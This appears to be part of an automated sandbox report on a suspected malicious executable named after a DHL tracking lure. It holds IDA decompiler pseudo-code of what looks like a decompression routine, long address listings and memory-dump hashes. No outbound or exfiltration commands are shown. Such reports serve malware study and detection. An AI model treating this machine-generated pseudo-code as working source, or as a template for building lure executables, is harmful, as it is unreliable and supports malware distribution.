												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                    0x00406481
                    0x00406481
                    0x00406481
                    0x00406481
                    0x00406487
                    0x0040648b
                    0x0040648f
                    0x00406499
                    0x004064a7
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00000000
                    0x00000000
                    0x004067ba
                    0x004067c3
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x00406811
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406813
                    0x00406813
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x004068c8
                    0x004068d2
                    0x004068da
                    0x004068e1
                    0x004068e3
                    0x004068ea
                    0x004068ee
                    0x004068ee
                    0x00406796
                    0x0040679c
                    0x004067a3
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x00000000
                    0x004067ae
                    0x00406818
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00406734
                    0x00405ed0
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x00405edf
                    0x00000000
                    0x00405ee6
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef0
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
                    0x00405f49
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4b
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f95
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fb7
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fbf
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x00406005
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x004068bc
                    0x00000000
                    0x004068bc
                    0x00406713
                    0x00406719
                    0x00406720
                    0x00406728
                    0x0040672b
                    0x0040672e
                    0x0040672e
                    0x00406734
                    0x00406734
                    0x00000000
                    0x00000000
                    0x0040604c
                    0x0040604c
                    0x0040604e
                    0x00406051
                    0x004060c2
                    0x004060c2
                    0x004060c5
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x00000000
                    0x004060d9
                    0x00406053
                    0x00406053
                    0x00406057
                    0x0040605a
                    0x0040605c
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406074
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x00406089
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x00406099
                    0x0040609c
                    0x004060ba
                    0x004060ba
                    0x004060bc
                    0x00000000
                    0x0040609e
                    0x0040609e
                    0x0040609e
                    0x004060a1
                    0x004060a4
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00000000
                    0x004060b5
                    0x00000000
                    0x004062eb
                    0x004062eb
                    0x004062ef
                    0x0040630d
                    0x0040630d
                    0x00406310
                    0x00406317
                    0x0040631a
                    0x0040631d
                    0x00406320
                    0x00406323
                    0x00406326
                    0x00406328
                    0x0040632f
                    0x00406330
                    0x00406332
                    0x00406335
                    0x00406338
                    0x0040633b
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x00406340
                    0x004062f1
                    0x004062f1
                    0x004062f4
                    0x004062f7
                    0x00406301
                    0x00000000
                    0x00000000
                    0x00406355
                    0x00406355
                    0x00406359
                    0x0040637c
                    0x0040637f
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x0040635b
                    0x0040635e
                    0x00406361
                    0x00406364
                    0x00406371
                    0x00406374
                    0x00406374
                    0x00000000
                    0x00000000
                    0x00406398
                    0x00406398
                    0x0040639c
                    0x00000000
                    0x00000000
                    0x004063a2
                    0x004063a2
                    0x004063a6
                    0x00000000
                    0x00000000
                    0x004063ac
                    0x004063ac
                    0x004063ae
                    0x004063b2
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x00000000
                    0x00000000
                    0x00406409
                    0x00406409
                    0x0040640d
                    0x00406414
                    0x00406414
                    0x00406417
                    0x0040641a
                    0x00406424
                    0x00000000
                    0x00406424
                    0x0040640f
                    0x0040640f
                    0x00000000
                    0x00000000
                    0x00406430
                    0x00406430
                    0x00406434
                    0x0040643b
                    0x0040643e
                    0x00406441
                    0x00406436
                    0x00406436
                    0x00406436
                    0x00406444
                    0x00406447
                    0x0040644a
                    0x0040644a
                    0x0040644d
                    0x00406450
                    0x00406453
                    0x00406453
                    0x00406456
                    0x0040645d
                    0x00406462
                    0x00000000
                    0x00000000
                    0x004064f0
                    0x004064f0
                    0x004064f4
                    0x00406892
                    0x00406892
                    0x00000000
                    0x00406892
                    0x004064fa
                    0x004064fa
                    0x004064fd
                    0x00406500
                    0x00406504
                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x00000000
                    0x00000000
                    0x00406682
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00406688
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x0040678a
                    0x00406745
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406830
                    0x00406833
                    0x00406734
                    0x00406734
                    0x00406734
                    0x00000000
                    0x0040673a
                    0x00000000
                    0x0040646a
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x0040678a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004064af
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x00406548
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004067b4
                    0x0040677d

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                    • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                    • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                    • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406682 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
